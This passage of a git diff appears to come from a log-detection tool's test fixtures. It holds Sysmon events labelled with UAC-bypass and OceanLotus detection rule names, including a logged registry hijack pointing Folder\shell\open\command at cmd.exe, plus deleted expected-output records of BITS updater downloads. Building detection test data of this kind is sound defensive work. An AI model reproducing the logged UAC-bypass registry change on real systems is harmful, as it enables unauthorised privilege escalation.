Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359028,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.398014Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man.LOG1","UtcTime":"2020-08-25 
10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359030,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401175Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man.LOG2","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359031,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401210Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 
10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359032,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401236Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms","UtcTime":"2020-08-25 
10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359033,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401303Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359036,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.418961Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.579","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf","UtcTime":"2020-08-25 10:08:37.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359040,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.594123Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.595","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms","UtcTime":"2020-08-25 
10:08:37.595"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359041,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.610172Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359044,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.677776Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 
10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359046,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.678592Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359047,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.678627Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC 
Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\TransactionLog.exe.log","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359048,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.678671Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-A104-5D46-0000-0010C79CBC03","ProcessId":7312,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Folder\\shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 
09:10:28.869"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5696,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:10:28.893194Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-A104-5D46-0000-001092A6BC03","ProcessId":2576,"RuleName":"PrivEsc - UAC bypass UACME-53","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Folder\\shell\\open\\command\\(Default)","UtcTime":"2019-08-04 09:10:29.025"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5698,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:10:29.060588Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\control.exe\" /name Microsoft.BackupAndRestoreCenter","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Control Panel","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=391FF1F690C0912C217B3CF625900D4F50128867,MD5=88EA810385F455C74306D71C4879C61C,SHA256=4774A931C9D97828323C9E829917D82C27A05DAB9FEA6A0CEF9EBBA59942231F,IMPHASH=7A8EC2645C24D85DE8216D63022623C0","Image":"C:\\Windows\\System32\\control.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\sdclt.exe\" ","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"747F3D96-A105-5D46-0000-00103BEBBC03","ParentProcessId":4532,"ProcessGuid":"747F3D96-A106-5D46-0000-00107201BD03","ProcessId":1380,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-04 09:10:30.346"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5702,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:10:30.752830Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}}]
\ No newline at end of file
diff --git a/e2e/search_expected.yml b/e2e/search_expected.yml
deleted file mode 100644
index 3c01842b..00000000
--- a/e2e/search_expected.yml
+++ /dev/null
@@ -1,2197 +0,0 @@ ---- -Event: - EventData: - Id: 400B6CF7-D355-4E0C-B9AE-4E8D8C8FF6A0 - bytesTotal: 1317080 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 1317080 - fileTime: "2020-10-01T02:19:35Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe" - peer: "" - transferId: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A - url: "http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A - EventID: 59 - EventRecordID: 8199 - Execution_attributes: - ProcessID: 4964 - ThreadID: 2612 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-10-17T11:50:02.661365Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: 400B6CF7-D355-4E0C-B9AE-4E8D8C8FF6A0 - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 1317080 - bytesTransferred: 1317080 - bytesTransferredFromPeer: 0 - fileLength: 1317080 - fileTime: "2020-10-01T02:19:35Z" - hr: 0 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A - url: 
"http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A - EventID: 60 - EventRecordID: 8200 - Execution_attributes: - ProcessID: 4964 - ThreadID: 368 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-10-17T11:50:15.796214Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Id: A5842CB6-8F50-4944-8AF7-2C088B21DDC3 - bytesTotal: 25802496 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 25802496 - fileTime: "2020-10-06T03:49:05Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe" - peer: "" - transferId: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 - url: "http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 - EventID: 59 - EventRecordID: 8206 - Execution_attributes: - ProcessID: 4028 - ThreadID: 908 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - 
Task: 0 - TimeCreated_attributes: - SystemTime: "2020-10-17T12:32:08.987914Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: A5842CB6-8F50-4944-8AF7-2C088B21DDC3 - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 25802496 - bytesTransferred: 25802496 - bytesTransferredFromPeer: 0 - fileLength: 25802496 - fileTime: "2020-10-06T03:49:05Z" - hr: 0 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 - url: "http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 - EventID: 60 - EventRecordID: 8222 - Execution_attributes: - ProcessID: 4028 - ThreadID: 6308 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-10-17T12:36:06.775288Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Id: 20160230-2E6F-428A-A61F-20740628577B - bytesTotal: 2014464 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 2014464 - fileTime: "2020-10-20T07:11:08Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe" - peer: "" - 
transferId: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE - url: "http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE - EventID: 59 - EventRecordID: 8448 - Execution_attributes: - ProcessID: 2788 - ThreadID: 948 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-10-23T21:55:59.769081Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: 20160230-2E6F-428A-A61F-20740628577B - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 2014464 - bytesTransferred: 2014464 - bytesTransferredFromPeer: 0 - fileLength: 2014464 - fileTime: "2020-10-20T07:11:08Z" - hr: 0 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE - url: "http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE - EventID: 60 - EventRecordID: 8449 - 
Execution_attributes: - ProcessID: 2788 - ThreadID: 9108 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-10-23T21:56:21.668986Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Id: DE4AC99A-C567-4CAA-9703-3FFEE775C75D - bytesTotal: 1708800 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 1708800 - fileTime: "2020-11-02T06:40:20Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe" - peer: "" - transferId: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 - url: "http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 